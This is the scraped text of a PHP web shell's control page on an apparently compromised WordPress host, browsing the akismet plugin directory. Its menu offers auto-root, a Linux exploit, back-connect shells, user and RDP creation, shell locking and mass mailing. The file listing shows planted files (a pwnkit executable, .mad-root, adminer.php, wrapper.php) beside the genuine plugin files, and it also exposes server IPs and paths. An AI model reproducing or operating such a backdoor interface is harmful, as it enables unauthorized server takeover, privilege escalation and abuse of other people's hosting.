Linux webm006.cluster103.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.103.20.6 | : 216.73.216.183
Cant Read [ /etc/named.conf ]
5.4.45
formahte
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
formahte /
www /
wp-content /
plugins /
akismet /
[ HOME SHELL ]
Name
Size
Permission
Action
_inc
[ DIR ]
drwxr-xr-x
views
[ DIR ]
drwxr-xr-x
.htaccess
633
B
-rw-r--r--
.mad-root
0
B
-rw-r--r--
LICENSE.txt
17.67
KB
-rw-r--r--
adminer.php
0
B
-rw-r--r--
akismet.php
2.48
KB
-rw-r--r--
changelog.txt
19.83
KB
-rw-r--r--
class.akismet-admin.php
49.91
KB
-rw-r--r--
class.akismet-cli.php
4.55
KB
-rw-r--r--
class.akismet-rest-api.php
10.87
KB
-rw-r--r--
class.akismet-widget.php
3.04
KB
-rw-r--r--
class.akismet.php
63.29
KB
-rw-r--r--
index.php
26
B
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
readme.txt
3.85
KB
-rw-r--r--
wrapper.php
6.29
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : .htaccess
# Only allow direct access to specific Web-available files. # Apache 2.2 <IfModule !mod_authz_core.c> Order Deny,Allow Deny from all </IfModule> # Apache 2.4 <IfModule mod_authz_core.c> Require all denied </IfModule> # Akismet CSS and JS <FilesMatch "^(form\.js|akismet\.js|akismet\.css)$"> <IfModule !mod_authz_core.c> Allow from all </IfModule> <IfModule mod_authz_core.c> Require all granted </IfModule> </FilesMatch> # Akismet images <FilesMatch "^logo-(a|full)-2x\.png$"> <IfModule !mod_authz_core.c> Allow from all </IfModule> <IfModule mod_authz_core.c> Require all granted </IfModule> </FilesMatch>
Close